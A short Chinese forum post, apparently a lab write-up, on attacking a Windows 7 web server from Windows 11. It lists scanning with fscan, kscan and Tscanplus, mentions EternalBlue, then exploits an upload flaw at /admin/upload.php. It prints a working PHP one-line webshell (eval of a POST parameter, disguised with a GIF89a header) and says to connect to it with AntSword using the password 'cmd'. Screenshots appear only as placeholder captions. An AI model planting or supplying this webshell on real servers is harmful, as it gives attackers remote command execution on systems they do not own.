Windows11入侵windows7web服务器 - ☕ 经验茶谈极核论坛 - 知识星球 - 极核GetShell

Windows11入侵windows7web服务器

信息收集

用fscan、kscan、Tscanplus……等等的工具扫描扫描扫描…….

屏幕截图(140)

 

屏幕截图(142)

屏幕截图(141)

屏幕截图(143)

 

漏洞利用

虽然发现了永恒之蓝漏洞,但本次的重点是web,所以我们的的侧重点在/admin/upload.php文件上传漏洞

屏幕截图(146)

 

上传webshell(一句话木马)

webshell:

GIF89a
<?php @eval($_POST[cmd]);?>

 

上传后用蚁剑连接,密码为”cmd”。

屏幕截图(144)

屏幕截图(145)

 

完成

请登录后发表评论